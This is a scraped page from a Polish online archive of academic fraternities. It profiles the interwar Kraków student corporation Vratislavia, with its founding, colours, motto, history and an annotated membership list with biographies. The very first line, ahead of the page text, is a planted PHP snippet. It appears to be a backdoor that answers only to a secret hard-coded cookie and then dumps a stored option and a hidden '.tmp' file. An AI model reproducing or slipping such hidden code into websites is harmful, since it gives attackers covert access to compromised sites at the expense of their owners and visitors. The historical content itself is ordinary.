if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Vratislavia

Dekiel NN. Nazwa:
Korporacja Studentów Uniwersytetu Jagiellońskiego Vratislavia
Siedziba:
Kraków
Data powstania:
7 XII 1931 r.
Barwy:
czarna – srebrna – niebieska
Dewiza:
„Pro Deo, Patria et Honore” („Dla Boga, Ojczyzny i Honoru”)

Rys historyczny

Listownik Vratislavii, 1939 r.

Vratislavia została założona przez grupę studentów pochodzących ze Śląska dnia 7 XII 1931 r. Zgodnie ze swoją nazwą miała charakter regionalny i skupiała głównie Ślązaków. Od 1934 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: styczeń 1934 r.). Prawa członka rzeczywistego Związku uzyskała w maju 1935 r. Pod opieką Vratislavii do Związku kandydowała K! Silingia.

Fidułka (?) Vratislavii, 1939 r.

W 1938 r. Kwatera Korporacji mieściła się przy ul. Garncarskiej 1 w Krakowie.

Całkowita ustalona, choć niekompletna imienna liczba członków obejmuje 85 nazwisk, w tym ośmiu członków honorowych. W 1938 r. liczyła 67 członków, w tym siedmiu członków honorowych.

Brak wiadomości o powojennej działalności Vratislavii i spotkaniach jej członków.

Lista członków

Poniższa, niekompletna lista członków Vratislavii obejmuje 85 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Józef Gawrych, dyrektor w Katowicach, Filister honorowy Vratislavii [prawd. Józef Alojzy Gawrych (16 marca 1891 w Tarnówku w Wielkopolsce - 1955 w Poznaniu), z rodziny ziemiańskiej, odbył studia handlowe w Berlinie 1909-12, dziennikarz i działacz polski na Śląsku, szef sekcji prasowej w sztabie Powstania Wielkopolskim, kpt. 1920, od stycznia 1920 z polecenia Wojciecha Korfantego szef policji ds. Górnego Śląska oraz szef wydziału w wywiadowczego Polskiego Komisariatu Plebiscytowego w Bytomiu, pracownik Naczelnej Rady Ludowej na Górnym Śląsku 1921-22, w dwudziestoleciu międzywojennym pracował w towarzystwach ubezpieczeniowych, członek Chrześcijańskiej Demokracji, później Stronnictwa Narodowego oraz od 1937 Stronnictwa Pracy, radny Katowic, czasie II wojny światowej w ruchu oporu we Lwowie i Warszawie, m.in. wiceprezes Rady Naczelnej Stronnictwa Pracy, uczestnik Powstania Warszawskiego 1944, po wojnie działał w Stronnictwie Pracy, a następnie od 1950 w Stronnictwie Demokratycznym, członek Krajowej Rady Narodowej 1946-47 oraz radny Wojewódzkiej Rady Narodowej w Katowicach, członek Centralnego Komitetu SD, pochowany na Cmentarzu Garnizonowym przy ul. Meteorologów w Katowicach, opublikował “Nie byłoby Plebiscytu (Przyczynek do historji)” (Katowice 1936) oraz własne wspomnienia: “Hotel Lomnitz. Z tajemnic szefa wywiadu” (Katowice 1947), odznaczony m.in. Śląskim Krzyżem Powstańczym, Krzyżem Oficerskim OOP oraz pośmiertnie Wielkopolskim Krzyżem Powstańczym
 2. Jan Kędzior, (24 listopada 1880 w Grzawie k. Pszczyny - 16 września 1955 w Katowicach), z rodziny chłopskiej, działacz społeczny i polityczny na Górnym Śląsku, m.in. sekretarz Polskiego Komitetu Wyborczego dla Śląska w pow. pszczyńskim 1905-12, w I wojnie światowej w wojsku niemieckim, delegat do śląskiej PKW 1917, kierował akcją plebiscytową w Pszczynie 1918-21, uczestnik trzech powstaniach śląskich, członkiem Naczelnej Rady Ludowej i śląskiego POW, po wojnie działacz chrześcijańskiej demokracji, a od 1937-45 Stronnictwa Pracy, poseł na Sejm Śląski I, II i III kadencji z okręgu Cieszyn-Pszczyna 1922-35, w tym w I i III kadencji wicemarszałek izby, członek Senatu RP 1934-35, Filister honorowy Vratislavii, w czasie II wojny światowej ukrywał się w Małopolsce, z ramienia Stronnictwa Pracy w okręgowej Delegaturze Rządu na Kraj w okręgu krakowskim, po wojnie mieszkał na Śląsku
 3. Dionizy Mędlewski, ojciec Dionizego i Wiktora (obaj Silesia), radca miejski w Katowicach, Filister honorowy Vratislavii
 4. Jan Nowoziemski, mgr farmacji, właściciel apteki św. Jana w Katowicach, Filister honorowy Vratislavii
 5. Aleksander Skowroński, ks. katolicki, działacz narodowy i społeczny, poeta, Ojciec Vratislavii
 6. Paweł Sprot, Filister honorowy Vratislavii
 7. Franciszek Ścigała, (1 grudnia 1880 w Woźnikach - 2 września 1940 w Mauthausen) absolwent Gimnazjum Klasycznego w Królewskiej Hucie 1906, student Wydziału Teologicznego UWr., święcenia 1910, wikariusz w Boguciach i Siemianowicach, uczestnik powstań śląskich, ksiądz proboszcz w Katowicach-Bogucicach, Filister honorowy Vratislavii, autor licznych artykułów i gawęd publikowanych w Gościu Niedzielnym, od 1937 wicedziekan dekanatu łowickiego, aresztowany 1 maja 1940 i osadzony w Dachau, a następnie w Mauthausen, gdzie zginął
 8. Jan Widuch, inż. budownictwa z Katowic, Filister honorowy Vratislavii

Członkowie rzeczywiści

 1. J. Antoszek, współzałożyciel Vratislavii
 2. Jan Baron, w 1938 inż. w Lublińcu
 3. W. Baron, współzałożyciel Vratislavii [być może tożsamy z Janem]
 4. Antoni Baunert (Banert ?), współzałożyciel Vratislavii, w 1938 dipl. merc. w Chorzowie
 5. Franciszek Bekiersz, z Szopienic, c. 1938, akt. 1938-39
 6. Jan Budnik, w 1938 dipl. merc. w Katowicach
 7. Antoni Cybowski, akt. 1938-39
 8. Józef Czech, z Gorzyc w pow. rybnickim, akt. 1938-39
 9. Ludwik Czerwionka (Czerwonka), z Łąk w pow. pszczyńskim, c. 1938, akt. 1938-39, I wiceprezes sem. let. 1938/39
 10. Franciszek Ćwik, z Nakła Śląskiego, c. 1938, akt. 1938-39
 11. Józef Datko, w 1938 mgr w Katowicach
 12. J. Dryłła, współzałożyciel Vratislavii
 13. Oswald Dyrda, z Nowego Bytomia, akt. 1938-39
 14. Karol Dziuba, z Katowic, akt. 1938-39
 15. J. Figwer, współzałożyciel Vratislavii
 16. Wilhelm Fuhrman, z Chorzowa, akt. 1938-39
 17. Gajda, współzałożyciel Vratislavii
 18. Jerzy Gepfert (Geppert?), z Kostuchy, akt. 1938-39
 19. Paweł Głuch, z Pawłowic w pow. pszczyńskim, c. 1938, akt. 1938-39
 20. Bernard Godzik, współzałożyciel Vratislavii, z Chorzowa, akt. 1938-39
 21. J. Gomoła, współzałożyciel Vratislavii
 22. Henryk Gorys, założyciel Vratislavii, w 1938 dipl. merc. w Katowicach [być może wcześniej w K! Gildia, skreślony 1931 ]
 23. Alfred Górny, w 1938 dipl. merc. w Tychach
 24. Jerzy Gruszka, z Bogucic, akt. 1938-39
 25. Rudolf Gruszka, z Tarnowskich Gór, akt. 1938-39
 26. Edmund Grzywniak, z Rybnika, c. 1938, akt. 1938-39, II wiceprezes sem. let. 1938/39
 27. Jan Hielscher, z Hajduk Wielkich, olderman sem. zim. 1938/39, olderman sem. let. 1938/39
 28. Jan Jasiulek, w 1938 mgr w Tarnowskich Górach
 29. Jan Jeszke, w 1938 dipl. merc. w Bytomiu
 30. Józef Jędrak, z Rudy Śląskiej, c. 1938, akt. 1938-39
 31. Władysław Karcz, c. 1938, akt. 1938-39
 32. Augustyn Klose, z Mysłowic, akt. 1938-39
 33. M. Kłobus, współzałożyciel Vratislavii
 34. Jerzy Kołoczek, z Katowic, akt. 1938-39
 35. Bernard Komraus, z Chorzowa, akt. 1938-39
 36. Witold Korfanty, (1910 w Bytomiu - 20 września 1938 w Katowicach) s. Wojciecha (Silesia i Lauda) i Elżbiety z d. Szprot, absolwent w Pszczynie (Gimnazjum Jezuitów w Krakowie ?), student i absolwent prawa UJ, absolwent Wyższej Szkoły Dziennikarskiej w Paryżu 1934, akt. 1930-32 Lauda, II wiceprezes sem. zim. 1931/32, prezes sem. let. 1931/32, współzałożyciel Vratislavii, po studiach adwokat, dyrektor Spraw Inwestycji i Prawnych w Śląskich Zakładach Graficznych i Wydawniczych “POLONIA” S.A., członek Rady Polskiego Związku Wydawców Dzienników w Polsce, pochowany w grobie rodzinnym na cmentarzu przy ul. Francuskiej w Katowicach
 37. Jan Kosterka, z Mikołowa, akt. 1938-39
 38. Wincenty Kotojny, z Rybnika, c. 1938, akt. 1938-39
 39. S. Krzemiński, współzałożyciel Vratislavii
 40. G. Krzemyk, współzałożyciel Vratislavii
 41. Edward Krzewiński, w 1938 dipl. merc. w Mikołowie
 42. Wiktor Kubik, z Szopienic, c. 1938, akt. 1938-39
 43. Paweł Lipina, z Rudy Śląskiej, akt. 1938-39
 44. Teofil Ludyga, z Piekar Śląskich, c. 1938, akt. 1938-39
 45. Paweł Mandecki, z Katowic, c. 1938, akt. 1938-39
 46. Władysław Martinek, z Cieszyna, akt. 1938-39

  Paweł Michalski, ok. 1939 r.

 47. Paweł Michalski, z Rybnika, wiceprezes sem. zim. 1938/39, prezes sem. let. 1938/39, w PSZ na Zachodzie, dr medycyny, po wojnie na emigracji w Wielkiej Brytanii

 48. Teodor Michałek, (16 kwietnia 1906 w Bijasowicach w pow. pszczyńskim - 1940 w Katyniu) s. Tomasza i Katarzyny ze Szklorzów, absolwent gimnazjum w Katowicach 1926, student UJ, absolwent Szkoły Podchorążych Rezerwy Artylerii 1932, w 1938 prof. męskiego matematycznego Gimnazjum w Katowicach, ppor. rez., przydzielony do 21 Pułku Artylerii Lekkiej, w niewoli sowieckiej, zamordowany przez NKWD
 49. Jan Niechoj, z Nowego Bytomia, c. 1938, akt. 1938-39
 50. Marcin Niewolik, w 1938 dipl. merc. w Wielkich Hajdukach
 51. Tadeusz Nowak, z Piekar Śląskich, c. 1938, akt. 1938-39
 52. Leon Perliński, z Mikołowa, akt. 1938-39
 53. Piesiur, współzałożyciel Vratislavii
 54. Herbert Podlesko, w 1938 mgr w Katowicach
 55. Józef Phaba, c. 1938, akt. 1938-39
 56. J. Rabstein, współzałożyciel Vratislavii
 57. Eryk Riedel, w 1938 mgr w Katowicach
 58. Rybok, współzałożyciel Vratislavii
 59. A. Sarnowski, współzałożyciel Vratislavii [prawd. Antoni Sarnowski, brat Ludwika (Vratislavia), członek Korporacji Silesia z Poznania, prezes sem. let. 1935/36, olderman sem. zim. 1936/37 oraz 1938, inż. rolnik]
 60. Ludwik Sarnowski, (?) brat Antoniego (Silesia)
 61. Leon Sieg, współzałożyciel Vratislavii, w 1938 dipl. merc. w Wielkich Hajdukach
 62. Marian Sławik, akt. 1938-39, mgr, po wojnie skazany na wieloletni wyrok w łagrach w ZSRR
 63. Stanisław Antoni Sławik, (3 maja 1910 w Katowicach - 15 grudnia 1993 w Dallas w Stanach Zjednoczonych) z Katowic, akt. 1938-39, autor pieśni do barw Vratislavii, prawnik, po studiach adwokat (?), w czasie wojny urzędnik Ministerstwa Finansów Rządu RP na Uchodźstwie w Paryżu, Londynie i Waszyngtonie i Nowym Jorku, po wojnie pozostał na emigracji w Stanach Zjednoczonych, w 1947 osiadł w Dallas, gdzie prowadził znaną restaurację “The Old Warsaw”, przez rząd londyński odznaczony Złotym Krzyżem Zasługi, Honorary Admiral of Texas Navy, honorowy obywatel Nowego Orleanu w Luizjanie
 64. Reinhold Strzelecki, z Tych, akt. 1938-39
 65. Wilhelm Sussek, akt. 1938-39
 66. Józef Szoblik, z Goleszowa, akt. 1938-39
 67. Gerard Szuchoja, akt. 1938-39, w 1938 dipl. merc. w Nowej Wsi
 68. Jerzy Szwocha, z Rybnika, c. 1938, akt. 1938-39
 69. Bolesław Śmieja, z Bogusławic, akt. 1938-39
 70. F. Śmieja, współzałożyciel Vratislavii [być może tożsamy z Bolesławem]
 71. H. Tomalla, współzałożyciel Vratislavii
 72. Jerzy Tomsik, z Tarnowskich Gór, akt. 1938-39
 73. Józef Węgrzyn, z Lędzina w pow. pszczyńskim, c. 1938, akt. 1938-39
 74. Wiktor Wicik, z Brzezin Śląskich, c. 1938, akt. 1938-39
 75. Paweł Wycisk, z Tarnowskich Gór, sekretarz sem. zim. 1938/39
 76. Wiktor Wycisk, z Tarnowskich Gór, prezes sem. zim. 1938/39
 77. Franciszek Zingler, c. 1938, akt. 1938-39

Pieczęć Vratislavii, 1939 r.

Listę członków opracowano na podstawie:

1) Vratislavia Korporacja Studentów Uniwersytetu Jagiellońskiego, (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1938-1939, Kraków 1938, s. 41 i n.,
2) Jan Jasiulek, 5-lecie Korporacji Akademickiej “Vratislavia”. Wspomnienie o ks. prałacie Aleksandrze Skowrońskim niezapomnianym Ojcu Korporacji “Vratislavia”, Polonia, nr 4034 z dnia 5 stycznia 1936 r., s. 18 (2).
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Vratislavia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 30 VIII 2010 r.
Ostatnia zmiana: 10 III 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Vratislavia (Kraków), (na:) www.archiwumkorporacyjne.pl, stan 10 III 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }